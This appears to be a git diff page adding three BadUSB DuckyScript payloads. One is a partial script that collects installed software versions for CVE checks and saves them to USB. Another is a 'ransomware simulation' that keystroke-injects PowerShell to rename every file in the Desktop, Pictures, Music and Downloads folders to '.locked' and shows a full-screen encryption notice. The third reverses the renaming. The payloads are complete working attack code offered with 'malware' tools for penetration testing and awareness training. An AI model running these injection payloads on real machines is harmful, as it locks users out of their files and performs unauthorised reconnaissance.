ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Combine running software and scheduled tasks
|
||||||
|
STRING $softwareList = @()
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($process in $runningSoftware) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $softwareList += $process.Name
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($task in $scheduledTasks) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Remove duplicates and empty entries
|
||||||
|
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Check CVEs for identified software
|
||||||
|
STRING foreach ($software in $softwareList) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($version) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-cve -productname $software -version $version >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING start-sleep -seconds $initialDelay
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Results saved to USB drive."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } else {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error: USB drive MYUSB not found."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING invoke-command -scriptblock $script
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 20000
|
||||||
|
REM check out github.com/markcyber for more badusb/pen testing scripts and tools
|
@ -0,0 +1,91 @@
|
|||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 1000
|
||||||
|
REM opens powershell (this is for windows machines)
|
||||||
|
STRING powershell
|
||||||
|
ENTER
|
||||||
|
DELAY 3000
|
||||||
|
REM Define the locations using correct SpecialFolder enumerations
|
||||||
|
STRING $folders = @(
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING [System.Environment+SpecialFolder]::Desktop,
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING [System.Environment+SpecialFolder]::MyPictures,
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING [System.Environment+SpecialFolder]::MyMusic,
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING [System.Environment+SpecialFolder]::Downloads
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING )
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Iterate over each location
|
||||||
|
STRING foreach ($folder in $folders) {
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING $path = [Environment]::GetFolderPath($folder)
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Get all files in the path and rename them
|
||||||
|
STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING }
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
REM Display ransomware message
|
||||||
|
STRING Add-Type -AssemblyName PresentationFramework
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING $Window = New-Object System.Windows.Window
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING $Window.WindowStartupLocation = 'CenterScreen'
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING $Window.WindowState = 'Maximized'
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING $Window.Topmost = $true
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING $Window.ShowDialog()
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
STRING exit
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
REM check out my github at github.com/markcyber for more badusb & hacking type tools
|
@ -0,0 +1,62 @@
|
|||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 2000
|
||||||
|
STRING powershell
|
||||||
|
ENTER
|
||||||
|
REM increased delays to make sure each command can go through even on slower computers
|
||||||
|
DELAY 6000
|
||||||
|
REM Define the locations using correct SpecialFolder enumerations
|
||||||
|
STRING $folders = @(
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRING [System.Environment+SpecialFolder]::Desktop,
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
STRING [System.Environment+SpecialFolder]::MyPictures,
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
STRING [System.Environment+SpecialFolder]::MyMusic,
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
STRING [System.Environment+SpecialFolder]::Downloads
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
STRING )
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 3000
|
||||||
|
REM Iterate over each location
|
||||||
|
STRING foreach ($folder in $folders) {
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRING $path = [Environment]::GetFolderPath($folder)
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 4000
|
||||||
|
REM Get all .locked files in the path and rename them back
|
||||||
|
STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') }
|
||||||
|
DELAY 2000
|
||||||
|
ENTER
|
||||||
|
DELAY 5000
|
||||||
|
STRING }
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 4000
|
||||||
|
STRING exit
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff
|
Loading…
Reference in New Issue
Block a user